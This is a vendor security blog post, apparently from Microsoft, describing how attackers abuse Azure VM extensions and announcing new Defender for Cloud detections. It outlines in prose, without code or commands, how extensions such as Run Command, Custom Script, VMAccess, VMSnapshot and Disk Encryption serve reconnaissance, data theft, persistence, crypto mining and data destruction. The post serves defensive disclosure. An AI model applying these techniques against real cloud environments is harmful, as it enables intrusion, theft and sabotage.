Throughout recent years, the IT world has shifted its workloads, management layers, and machines to the cloud, thus introducing a new attack surface, accompanied by new attack vectors. The following introduced a tactic for threat actors to deploy their cyber-attacks against organizations' cloud environments, gaining strong permissions, operating for financial gain, and more.
Upon succeeding in compromising an identity with sufficient permissions in Azure, threat actors often try to abuse existing features within the environment that allow them to deploy their malicious activity stealthily, efficiently, and easily, and one special feature is: Azure VM extensions.
Announcing new detections and alerts against extension abuse
Today, we continue to deliver customer protection as a result of extensive research and monitoring, thus announcing the new and enhanced protection capabilities that Microsoft Defender for Cloud offers as part of Microsoft Defender for Servers plan 2 offering, against extension abuse, and its importance.
Our customers can enjoy the protection capabilities effortlessly, without the need to manually deploy a dedicated agent on the VM.
Azure virtual machine extensions
Azure virtual machines extensions are small applications that provide post-deployment configuration and automation on Azure VMs, such as software updates, code and script execution, antimalware deployments, and more.
VM extensions play an instrumental role in workload management and VM maintenance. Many organizations' cloud environments are dependent on the extension's capabilities, such as automation in configuration deployment, security management, continuous monitoring, troubleshooting and log analytics.
On the other hand, extensions can be abused as a powerful cloud-native tool by threat actors who gained an initial foothold in the victim's Azure environment. Solely dependent on Azure RBAC permissions, threat actors can abuse VM extensions to execute operations with high privileges to perform stealthy and destructive cyber-attacks.
In this blog, we will discuss the various extensions, their uniqueness, the corresponding MITRE techniques associated with them that are abused in the wild and researched in the security world, and introduce Microsoft Defender for Cloud new series of alerts that combats this abuse.
The following extensions allow different kinds of data collection and monitoring over network traffic, resources data, diagnostics, analytics and more.
- Network Watcher allows threat actors to capture network traffic, analyze packets, verify IP flow, and diagnose network security groups (NSGs).
The Network Watcher tool can be invaluable for advanced threat actors looking to learn about the environment topology and identify weaknesses in the victim's cloud environment by:
- Understanding the structure of the environment's security framework.
- Using IP Flow to verify packet allowance to find exposed resources.
- Analyzing existing NSGs to determine how to manipulate them to gain access and then persistence.
- Azure Monitor allows threat actors to create data collection rules over resources, in order to capture various kinds of machine logs and events.
Capturing Windows events of different kinds like security, system, and applications logs, could be of high importance for threat actors to gather information about the running compute inside the environment.
This can be done by creating a dedicated log analytics that will consume the logs from the Azure Monitor agent on the VM.
- VMSnapshot allows threat actors to capture VM disks snapshots as part of Azure Backup service.
Through Microsoft's extensive research and investigation of recent sophisticated attacks, evidence has shown that not only do threat actors attempt to reset passwords and gain access and persistence to VMs by leveraging the VMAccess extension (which will be discussed later on), they also attempt to capture disk snapshots of VMs that capture their interest during the initial phases, by leveraging Azure Backup service capabilities.
Capturing disk snapshots allows threat actors to export critical data from the VM's disks during a short window of time, to a local or remote location, using a dedicated URL for downloading, or copying the disk to another location in the environment. After that, threat actors will attempt to attach the snapshots of the disks to their own controlled machines, after configuring them to the right format.
Azure VM extensions offer a variety of ways for code execution and running scripts as SYSTEM/sudo on your virtual machines, thus providing threat actors with a powerful tool to facilitate deployments of their different attack techniques, at scale:
Run Command uses the VM agent to run scripts on the VM, as SYSTEM/sudo.
It can be abused in a variety of ways, from running recon commands to learn about the victim's cloud environment, creating local admin users for persistence, to downloading payloads on the machine, executing crypto miners for impact, and more.
The custom script extension allows the user to download and run a script on the VM, as SYSTEM/sudo.
CSE can be used to deploy different attack vectors at scale especially when looking to run the same script across different VMs within a virtual machine scale set (unlike Run Command).
As an example, Microsoft witnessed the following techniques being abused by a threat actor:
- Password Spraying campaign
- Threat actor successfully gains initial access to user accounts in Azure.
- Mass compute resource creation
- Threat actor sets up the crypto mining environment with the needed network resources.
- Mass deployment of XMRig software on all compute using Custom Script Extensions to initiate the crypto mining campaign.
The extension uploads and applies a DSC configuration on the VM.
Using DSC, threat actors can maliciously deploy scheduled tasks, apply configurations, and execute scripts, resulting in the deployment of a backdoor, connection to a C2 (Command and Control), extracting the VM managed identity, and more.
The VMAccess extension allows the user to manage administrative users and reset access on Azure VMs.
Threat actors often abuse the VMAccess extension to gain access to VMs inside the victim's environment, after they gain initial foothold, by resetting passwords, SSH keys, and manipulating the admin users in the VM.
As a result, they can choose their target wisely inside the environment and gain access to it, only by using the cloud native RBAC roles needed to execute the extension, thus, discovering sensitive information and disrupting critical workloads inside the environment.
We can see that the new user can successfully run commands as sudo:
The extension provides the ability to install the NVIDIA or AMD GPU drivers on supported compute VMs, which are GPU card equipped, in order to take full advantage of the card capabilities.
Threat actors can leverage this capability to deploy a GPU driver on supported Azure VMs in the victim's Azure environment and follow up with the installation of crypto mining software by leveraging the Custom Script Extension, or any other technique, and move on to the mining phase.
Azure Disk Encryption uses BitLocker to provide full disk encryption on Azure virtual machines.
Threat actors can abuse this extension by attempting to encrypt the VMs' disks in the victim's cloud environment that captures the threat actor's interest, with the goal to render all data permanently inaccessible by attempting to delete the encryption key or the key vault that contains the key.
In such cases, it is crucial for the victim to be aware of purge protection and the protection measures that Microsoft provides to delay/prevent the deletion of the encryption key.
After going through the abuse scenarios for the variety of VM extensions, we will dive through Microsoft's new detection capabilities and techniques, and how we are able to defend our customers through continuous monitoring and analysis of suspicious signals, from the control plane to the endpoint.
Not only does the new series of detections target a wide range of abuse techniques, but it also targets a wide range of extension abuse types, to protect our customers against attack vectors that emerge.
Through extensive research, we have been able to single out and identify the suspicious signals for which the likelihood of a breach is high, and as a result of studying the user's behavior, and monitoring for such signals, we are able to detect suspicious activity, some of the signals are the following:
- Usage of VM extensions by a user account which hasn't used any VM extensions recently.
- A sudden surge in extension usage by a suspicious user account, which might indicate a post-breach reconnaissance, impact, or persistence activity.
- Code or script execution containing parts that indicate a malicious intent.
- Usage of a combination of extensions in a short time windows which might indicate a recon attempt.
Identities in Azure require certain high privileged roles in Azure to be able to use extensions, this is yet another example of how identities and permissions represent the core of the cloud environment's access controls. As a result, we recommend building a strong framework which is least privileged based, in order to provide the identity with the least permissions needed to perform its dedicated and legitimate operations and prevent imminent attacks.
In addition to the above, continuous monitoring and detection efforts are essential to remediate ongoing attacks and prevent possible future ones.
With the advent and continued growth of cloud computing in Azure, many threat actors rely on techniques that facilitate their deployment of malicious activities, thus targeting Azure VM Extensions.
As a result of in-depth research and continued monitoring, Microsoft Defender for Cloud is announcing a detection campaign to provide its customers with strong security measures for sophisticated attack vectors and threat actor campaigns targeting extensions abuse.
Learn more about VM extensions: Link
Learn more about Defender for Cloud plans: Link
Learn more about Defender for Servers plans: Link